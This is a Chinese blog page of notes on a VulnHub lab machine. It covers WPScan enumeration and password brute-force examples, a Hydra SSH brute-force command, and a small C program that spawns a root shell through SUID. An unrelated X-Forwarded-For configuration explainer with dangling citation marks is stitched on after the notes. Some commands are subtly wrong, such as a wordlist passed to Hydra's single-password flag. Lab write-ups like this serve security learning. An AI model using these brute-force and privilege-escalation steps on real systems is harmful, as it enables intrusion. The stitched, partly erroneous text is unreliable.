vunhub 靶机之旅-1

本文详细介绍如何使用WPScan进行WordPress站点的安全扫描,包括枚举插件、主题、用户及密码爆破等操作,辅以Nmap、Hydra和SUID提权技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

youtube视频:
https://www.youtube.com/watch?v=SerBliNAh1k

nmap
-A 同时打开操作系统指纹和版本检测

wpscan --url 查找 -e enumerate 列举 --enumerate u列举用户
Examples :

帮助
-Further help …
ruby ./wpscan.rb --help
做“非侵入性”检查
-Do ‘non-intrusive’ checks …
ruby ./wpscan.rb --url www.example.com
使用50个线程对枚举的用户做单词列表密码蛮力…
-Do wordlist password brute force on enumerated users using 50 threads …
ruby ./wpscan.rb --url www.example.com --wordlist darkc0de.lst --threads 50
做单词表密码蛮力上的“管理员”用户名只…
-Do wordlist password brute force on the ‘admin’ username only …
ruby ./wpscan.rb --url www.example.com --wordlist darkc0de.lst --username admin
枚举安装的插件…
-Enumerate installed plugins …
ruby ./wpscan.rb --url www.example.com --enumerate p
枚举安装的主题
-Enumerate installed themes …
ruby ./wpscan.rb --url www.example.com --enumerate t
枚举用户
-Enumerate users …
ruby ./wpscan.rb --url www.example.com --enumerate u
枚举安装的TimTrBBS
-Enumerate installed timthumbs …
ruby ./wpscan.rb --url www.example.com --enumerate tt
使用HTTP代理
-Use a HTTP proxy …
ruby ./wpscan.rb --url www.example.com --proxy 127.0.0.1:8118
使用SoCKS5代理
-Use a SOCKS5 proxy … (cURL >= v7.21.7 needed)
ruby ./wpscan.rb --url www.example.com --proxy socks5://127.0.0.1:9000
使用自定义内容目录
-Use custom content directory …
ruby ./wpscan.rb -u www.example.com --wp-content-dir custom-content
使用自定义插件目录
-Use custom plugins directory …
ruby ./wpscan.rb -u www.example.com --wp-plugins-dir wp-content/custom-plugins
更新数据库
-Update the DB …
ruby ./wpscan.rb --update
调试输出
-Debug output …
ruby ./wpscan.rb --url www.example.com --debug-output 2>debug.log

See README for further information.

先去/home 目录 看用户
再去 /etc/ssh 看 sshd_config
得到 可以ssh的用户

ssh id@localhost
hydra 使用方法:https://www.cnblogs.com/ECJTUACM-873284962/p/7805116.html

hydra -l anne -p /usr/share/wordlists/nmap.lst ssh://192.168.247.128
ip + 服务
-s 指定端口
-l 指定用户
-L 指定用户字典
-p 指定密码破解
-P 指定密码字典(文件)

SUID提权 文章:https://www.cnblogs.com/hookjoy/p/6612595.html
#include <stdio.h>
#include <stdlib.h>
int main (void){
seteuid(0);
setegid(0);
system("/bin/bash -p");
return 0;
}
gcc -o hello hello.c

编译后运行,暂时提权
sudo ./hello

:从最开始的FTP 端口的匿名用户进去的,主站是worldpress,进行SSH的爆破 得到密码,查找得到某些用户不能密码登陆。
最后SUID 提权

收获:简单实用nmap,wpscan,ftp命令,hydra 爆破 SUID 提权 /home目录与 /etc/ssh的sshd_config 对比 得确切用户

### 关于靶机中 X-Forwarded-For 的使用场景及配置方法 #### 使用场景 `X-Forwarded-For` 是一个HTTP头字段,通常由代理服务器、负载均衡器或其他中间件设置。该头部用于识别通过HTTP代理或负载平衡器之后的客户端原始IP地址。当请求经过多个中介节点时,每个节点可以在 `X-Forwarded-For` 头部追加自己的IP地址,形成一系列的IP列表[^4]。 对于Web应用程序而言,在处理来自外部网络的流量时,如果前端部署有反向代理,则应用本身接收到的是代理服务器的IP而非最终用户的实际公网IP。此时就需要依赖 `X-Forwarded-For` 来获取真实的访问者信息[^2]。 #### 配置方法 在Linux环境下(如Ubuntu),可以通过修改Nginx或Apache等Web服务器配置文件来支持并信任特定来源的 `X-Forwarded-For` 请求头: ##### Nginx 配置示例 编辑站点配置文件 `/etc/nginx/sites-available/default` 或其他自定义位置下的相应配置文件,加入如下内容: ```nginx location / { proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; } ``` 上述配置使得Nginx能够正确转发客户端的真实IP给后端的应用程序,并且会自动累加现有的 `X-Forwarded-For` 值。 ##### Apache 配置示例 针对Apache Web Server, 修改 `.htaccess` 文件或者主配置文件中的 `<VirtualHost>` 指令部分,添加以下指令: ```apache RequestHeader set X-Forwarded-Proto "https" SetEnvIf X-Forwarded-For "^.*\..*\..*\.." forwarded=yes RequestHeader append X-Forwarded-For %{REMOTE_ADDR}s env=forwarded ``` 这段代码实现了类似的功能——即确保每次请求都携带更新后的 `X-Forwarded-For` 字段传递至下游服务。 为了使更改生效,记得重启相应的Web服务器进程: ```bash sudo systemctl restart nginx # or for apache sudo systemctl restart apache2 ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值